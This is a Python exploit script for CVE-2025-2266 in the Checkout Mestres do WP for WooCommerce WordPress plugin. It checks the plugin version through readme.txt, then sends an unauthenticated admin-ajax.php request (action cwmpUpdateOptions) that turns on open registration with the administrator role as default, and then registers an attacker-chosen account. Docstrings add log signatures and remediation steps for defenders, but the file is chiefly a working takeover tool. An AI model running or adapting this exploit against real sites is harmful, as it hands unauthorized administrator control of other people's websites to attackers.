POC / CVE-2025-2266.py PY
# -*- coding: utf-8 -*-
import requests
import argparse
import time

# Exploit By : Nxploited | Khaled Alenazi,

# Silence every urllib3 warning for the whole process. Together with
# `session.verify = False` in prepare_session(), this hides the
# InsecureRequestWarning that would otherwise flag each unverified HTTPS
# request, so the operator gets no signal that responses are unauthenticated.
requests.packages.urllib3.disable_warnings()

def parse_arguments():
    """Parse the command line and return the resulting namespace.

    Options:
        -u / --url   base URL of the WordPress site (required).
        -newuser     account name to register; when the flag is given
                     without a value the constant "nxploited" is used, and
                     when the flag is absent the attribute is None.
        -email       address submitted with the registration form; a
                     built-in default applies when omitted.

    The constant account name is a fixed string, which makes it usable as a
    search term when reviewing a site's user table after suspected abuse.
    """
    cli = argparse.ArgumentParser(
        description="CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit By : Nxploited | Khaled Alenazi,"
    )
    # Each entry is (option strings, keyword settings) for one add_argument call.
    option_specs = (
        (
            ("-u", "--url"),
            {
                "required": True,
                "help": "Target WordPress site URL (e.g., http://example.com/wordpress)",
            },
        ),
        (
            ("-newuser",),
            {
                "nargs": '?',
                "const": "nxploited",
                "help": "Create new admin user (default username: nxploited)",
            },
        ),
        (
            ("-email",),
            {
                "nargs": '?',
                "const": "[email protected]",
                "default": "[email protected]",
                "help": "Email for new user (default: [email protected])",
            },
        ),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()

def prepare_session():
    """Build the shared requests.Session used for every request.

    Two properties are set on the session:

    * ``verify = False`` - TLS certificates are not validated, so the
      identity of the responding host is never checked.
    * a fixed desktop-Chrome ``User-Agent`` string - every request from
      this script carries the same value, which makes it a stable (though
      easily changed) string to match in web-server logs.

    No cookies or credentials are added; the session starts anonymous.
    """
    browser_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    http = requests.Session()
    http.verify = False
    http.headers["User-Agent"] = browser_ua
    return http

def get_urls(base_url):
    """Derive the three endpoint URLs the script talks to.

    Args:
        base_url: site root without a trailing slash.

    Returns:
        A 3-tuple ``(ajax_url, register_url, readme_url)``.

    These are the request paths that appear in the target's access log
    when the script runs: the plugin's readme.txt, then admin-ajax.php,
    then the wp-login.php registration form.
    """
    endpoint_paths = (
        "/wp-admin/admin-ajax.php",
        "/wp-login.php?action=register",
        "/wp-content/plugins/checkout-mestres-wp/readme.txt",
    )
    return tuple(f"{base_url}{path}" for path in endpoint_paths)

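def check_plugin_vulnerability(session, readme_url):
    """Report whether the plugin readme advertises one of the affected tags.

    Args:
        session: object exposing ``get(url, timeout=...)`` whose result has
            a ``text`` attribute (a requests.Session in this script).
        readme_url: URL of the plugin's readme.txt.

    Returns:
        True only when the readme body contains "Stable tag: 8.6.5" or
        "Stable tag: 8.7.5"; False otherwise, including when the readme
        cannot be fetched.

    Only those two literal tags are recognised, so a False result is not
    evidence that an install is patched; confirm the installed plugin
    version directly when auditing a site.
    """
    affected_tags = ("Stable tag: 8.6.5", "Stable tag: 8.7.5")
    try:
        readme_text = session.get(readme_url, timeout=10).text
    except Exception as e:
        # Fail closed. The previous behaviour returned True here, which let
        # the caller send a state-changing request to a host whose plugin
        # version had never been confirmed. An unreadable readme says
        # nothing about the version, so it must not count as a positive.
        print(f"[!] Could not read readme.txt: {e}")
        print("[-] Version could not be confirmed; not proceeding.")
        return False

    if any(tag in readme_text for tag in affected_tags):
        print("[+] Target is vulnerable! Exploiting now...")
        time.sleep(3)
        return True

    print("[-] Plugin version is not vulnerable.")
    return False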

def enable_registration(session, ajax_url):
    """POST the option-update request and report whether it was accepted.

    The form carries ``action=cwmpUpdateOptions`` and a ``data`` string
    naming two WordPress options, ``users_can_register=1`` and
    ``default_role=administrator``. The session has performed no login
    before this call, so the request is sent without authentication.

    Args:
        session: object exposing ``post(url, data=...)``.
        ajax_url: the site's admin-ajax.php URL.

    Returns:
        True when the response body contains "sucesso" (case-insensitive).

    For defenders: the log signature is a POST to admin-ajax.php with that
    action value from a client holding no login cookie. On a site that may
    have been hit, check the "Anyone can register" setting and the
    "New User Default Role" under Settings > General, review recently
    created administrator accounts, and update the plugin past the
    affected releases.
    """
    form = dict(
        action="cwmpUpdateOptions",
        data="users_can_register=1&default_role=administrator",
    )
    reply = session.post(ajax_url, data=form)
    print(f"[DEBUG] Response from exploit: {reply.text.strip()}")
    return "sucesso" in reply.text.lower()

def register_new_user(session, register_url, username, email, base_url):
    """Submit the WordPress self-registration form and print the outcome.

    Args:
        session: object exposing ``post(url, data=...)``.
        register_url: the wp-login.php?action=register URL.
        username: value sent as ``user_login``.
        email: value sent as ``user_email``.
        base_url: site root, used only in the printed login hint.

    Returns:
        None. All results are printed.

    The success branch is taken when the body contains "username" or the
    status code is 200, so the printed "registered successfully" line does
    not prove an account was created. No password is set here; the script
    tells the operator to use the reset link, which is mailed to the
    submitted address. For incident review, the submitted username and
    e-mail are what to look for in the site's user table.
    """
    form = {"user_login": username, "user_email": email}
    reply = session.post(register_url, data=form)
    print(f"[DEBUG] Response from registration: {reply.text.strip()}")

    looks_accepted = "username" in reply.text.lower() or reply.status_code == 200
    if not looks_accepted:
        print("[!] Registration sent, but check manually if user was created.")
        return

    report = (
        f"[+] Step 2: User '{username}' registered successfully.",
        f"[!] Login at: {base_url}/wp-login.php",
        f"[!] Username: {username}",
        f"[!] Email: {email}",
        "[!] Set password manually from admin panel or reset link.\n",
    )
    for line in report:
        print(line)
def main():
    """Run the three stages in order and print progress.

    Flow, as visible to the target's web server:
      1. GET the plugin readme.txt (version check).
      2. POST to admin-ajax.php (option update) - only if step 1 passed.
      3. POST to the registration form - only if step 2 reported success
         and -newuser was supplied.

    That fixed readme -> admin-ajax -> register sequence from one client
    within a few seconds is itself a useful correlation pattern for log
    review.
    """
    args = parse_arguments()
    base_url = args.url.rstrip("/")
    username = args.newuser or None
    email = args.email
    session = prepare_session()
    ajax_url, register_url, readme_url = get_urls(base_url)

    banner = (
        "====================================",
        "     CVE-2025-2266 Exploit Tool     ",
        "     Author: Nxploited | Khaled Alenazi",
        "====================================\n",
    )
    for line in banner:
        print(line)

    # Each stage gates the next; the first failing stage prints its message.
    if not check_plugin_vulnerability(session, readme_url):
        print("[-] Target does not appear vulnerable.")
    elif not enable_registration(session, ajax_url):
        print("[-] Exploit failed — target may not be vulnerable.")
    elif username:
        register_new_user(session, register_url, username, email, base_url)

    print("\n[✓] Exploit By Nxploited | Khaled Alenazi")

# Run the tool only when this file is executed as a script; importing the
# module performs no network activity beyond the warning suppression above.
if __name__ == "__main__":
    main()